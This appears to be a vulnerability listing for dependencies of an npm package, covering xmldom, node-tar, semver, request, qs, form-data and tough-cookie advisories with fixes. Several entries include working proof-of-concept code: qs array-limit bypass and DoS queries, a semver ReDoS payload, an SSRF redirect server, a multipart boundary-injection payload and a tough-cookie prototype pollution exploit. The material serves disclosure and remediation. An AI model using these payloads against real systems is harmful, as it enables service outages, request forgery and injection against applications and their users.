All vulnerabilities related to version 1.0.3 of the package
Misinterpretation of malicious XML input
xmldom versions 0.6.0 and older do not correctly escape special characters when serializing elements removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications.
Update to one of the fixed versions of @xmldom/xmldom (>=0.7.0)
See issue #271 for the status of publishing xmldom to npm or join #270 for Q&A/discussion until it's resolved.
Downstream applications can validate the input and reject the maliciously crafted documents.
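One possible (heuristic) shape for such a check, assuming the input is re-serialized before further processing; this is a sketch of my own, not part of the advisory:

const { DOMParser, XMLSerializer } = require('xmldom');

// Heuristic: parse, serialize, re-parse, re-serialize. If the document does
// not round-trip to the same string, escaping was lost somewhere; reject it.
function roundTripsCleanly(xml) {
  const parser = new DOMParser();
  const serializer = new XMLSerializer();
  const first = serializer.serializeToString(parser.parseFromString(xml, 'text/xml'));
  const second = serializer.serializeToString(parser.parseFromString(first, 'text/xml'));
  return first === second;
}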
This is similar to a vulnerability reported against the Go standard library.
xmldom allows multiple root nodes in a DOM
xmldom parses XML that is not well-formed because it contains multiple top-level elements, and adds all root nodes to the childNodes collection of the Document, without reporting or throwing an error.
This breaks the assumption that there is only a single root node in the tree, which led to https://nvd.nist.gov/vuln/detail/CVE-2022-39299 and is a potential issue for dependents.
Update to @xmldom/xmldom@~0.7.7, @xmldom/xmldom@~0.8.4 (dist-tag latest) or @xmldom/xmldom@>=0.9.0-beta.4 (dist-tag next).
One of the following approaches might help, depending on your use case:
- Instead of searching for elements in the whole DOM, only search within the documentElement.
- Reject documents whose Document node has more than one childNode (a minimal check of this kind is sketched below).
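A minimal sketch of the second approach, assuming the document was parsed with xmldom's DOMParser:

const { DOMParser } = require('@xmldom/xmldom');

function parseSingleRoot(xml) {
  const doc = new DOMParser().parseFromString(xml, 'text/xml');
  // A well-formed document has exactly one element child on the Document node.
  let roots = 0;
  for (let i = 0; i < doc.childNodes.length; i++) {
    if (doc.childNodes[i].nodeType === 1 /* ELEMENT_NODE */) roots++;
  }
  if (roots !== 1) {
    throw new Error('Rejected: document has ' + roots + ' root elements');
  }
  return doc;
}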
Denial of service while parsing a tar file due to lack of folders count validation
During some analysis today on npm's node-tar package, I came across the folder creation process. Basically, if you provide node-tar with a path like ./a/b/c/foo.txt, it creates every folder and sub-folder here (a, b, and c) until it reaches the last one, where it creates foo.txt. I noticed that there is no validation at all on the number of folders being created, which means we can consume the CPU and memory of the system running node-tar, and even crash the Node.js client within a few seconds, using a path with too many sub-folders in it.
You can reproduce this issue by downloading the tar file I provided in the resources and extracting it with node-tar; you should see the same behavior as in the video.
Here's a video showcasing the exploit:
Denial of service by crashing the Node.js client when it attempts to parse a tar archive, making it run out of heap memory and consuming the server's CPU and memory resources.
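Until you can update, one possible defensive measure (my suggestion, not an official fix) is to cap entry depth with node-tar's filter option:

const tar = require('tar');

const MAX_DEPTH = 32; // arbitrary cap; tune for your use case

tar.extract({
  file: 'suspicious.tar',
  cwd: './out',
  // Skip any entry whose path nests deeper than MAX_DEPTH folders.
  filter: (entryPath) => entryPath.split('/').length <= MAX_DEPTH,
}).then(() => console.log('done'));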
This was originally reported to GitHub's bug bounty program; they asked me to report it to you a month ago.
semver vulnerable to Regular Expression Denial of Service
Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
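A rough way to observe the superlinear parse time on an affected version (the padding-based payload shape is an illustration of the class of input, not the canonical proof of concept):

const semver = require('semver'); // a version before the fixes listed above

for (const n of [10000, 20000, 40000]) {
  const range = '1.2.3 ' + ' '.repeat(n) + ' <1.3.0';
  const start = Date.now();
  try { new semver.Range(range); } catch (e) { /* an invalid range is fine here */ }
  console.log('n=' + n + ': ' + (Date.now() - start) + ' ms');
}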
Server-Side Request Forgery in Request
The request package through 2.88.2 for Node.js and the @cypress/request package prior to 3.0.0 allow a bypass of SSRF mitigations via an attacker-controlled server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).
NOTE: The request package is no longer supported by the maintainer.
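To illustrate the redirect trick (a minimal sketch; the hostnames are placeholders), the attacker-controlled server only has to answer with a cross-protocol redirect:

const http = require('http');

http.createServer((req, res) => {
  // Cross-protocol redirect (HTTP -> HTTPS). SSRF filters that only vet the
  // initial URL may follow this redirect without re-checking the target.
  res.writeHead(302, { Location: 'https://internal.example/admin' });
  res.end();
}).listen(8080);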
qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion
The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.
The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).
Vulnerable code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
obj = utils.combine([], leaf); // No arrayLimit check
}
Working code (lib/parse.js:175):
else if (index <= options.arrayLimit) { // Limit checked here
obj = [];
obj[index] = leaf;
}
The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.
Test 1 - Basic bypass:
npm install qs
const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length); // Output: 6 (should be max 5)
Test 2 - DoS demonstration:
const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length); // Output: 10000 (should be max 100)
Configuration: arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
Payload format: a[]=value (bracket notation, not indexed a[0]=value)
Impact: Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.
Attack scenario:
An attacker sends GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times); the server parses the query string with qs.parse(query, { arrayLimit: 100 }), expecting the limit to hold. A vulnerable endpoint of this shape is sketched below.
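A minimal sketch of such an endpoint (Express, the route name, and the parameter name are illustrative assumptions):

const express = require('express');
const qs = require('qs');

const app = express();

app.get('/api/search', (req, res) => {
  // arrayLimit is expected to cap array growth, but bracket
  // notation (filters[]=x) bypasses the check entirely.
  const parsed = qs.parse(req.url.split('?')[1] || '', { arrayLimit: 100 });
  res.json({ filterCount: (parsed.filters || []).length });
});

app.listen(3000);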
Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at lines 147-151, but it is not used in the bracket notation handler at line 159.
Current code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
? []
: utils.combine([], leaf); // No arrayLimit check
}
Fixed code:
if (root === '[]' && options.parseArrays) {
// Use currentArrayLength already calculated at line 147-151
if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
}
// If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
if (currentArrayLength >= options.arrayLimit) {
obj = options.plainObjects ? { __proto__: null } : {};
obj[currentArrayLength] = leaf;
} else {
obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
? []
: utils.combine([], leaf);
}
}
This makes bracket notation behavior consistent with indexed notation, enforcing arrayLimit and converting to an object when the limit is exceeded (per the README documentation).
form-data uses an unsafe random function for choosing its multipart boundary
form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker can observe other values produced by Math.random() in the target application and can control one field of a request made using form-data.
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, including those used to generate form-data's boundary value. This allows the attacker to craft a value that contains the boundary, allowing them to inject additional parameters into the request.
This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347
An attacker who is able to predict the output of Math.random() can predict this boundary value and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application in order to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker, including by form-data itself: if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data (such as a user-controlled webhook), they can observe the boundary values from those requests and thereby the Math.random() outputs. A common example would be an x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend, and Math.random() is a fine place to get these sorts of IDs (in fact, OpenTelemetry uses Math.random() for this purpose).
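Once the boundary value is predicted, the injection itself is simple string construction (a sketch; the boundary and the injected field name are hypothetical):

// Hypothetical predicted boundary (form-data derives the real one from Math.random()).
const predictedBoundary = '--------------------------123456789012345678901234';
// A "benign" field value that terminates the current part and smuggles in
// an extra, fully attacker-controlled field named is_admin (illustrative).
const maliciousValue =
  'benign\r\n' +
  '--' + predictedBoundary + '\r\n' +
  'Content-Disposition: form-data; name="is_admin"\r\n' +
  '\r\n' +
  'true';
console.log(maliciousValue);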
PoC here: https://github.com/benweissmann/CVE-2025-7783-poc
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
For an application to be vulnerable, it must:
- Use form-data to send data, including user-controlled data, to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending them (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array).
- Expose other outputs of Math.random() somewhere the attacker can observe them, so that the attacker can solve for the state of the PRNG (see above).

If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
tough-cookie Prototype Pollution vulnerability
Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.
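A commonly cited proof of concept for this issue (the cookie name and paths are illustrative):

const { CookieJar } = require('tough-cookie'); // a version before 4.1.3

async function poc() {
  const jar = new CookieJar(undefined, { rejectPublicSuffixes: false });
  // With public-suffix rejection disabled, a Domain of __proto__ ends up
  // used as an object key during initialization, polluting Object.prototype.
  await jar.setCookie(
    'Slonser=polluted; Domain=__proto__; Path=/notauth',
    'https://__proto__/admin'
  );
  const obj = {};
  console.log(obj['/notauth']); // defined on a vulnerable version
}

poc();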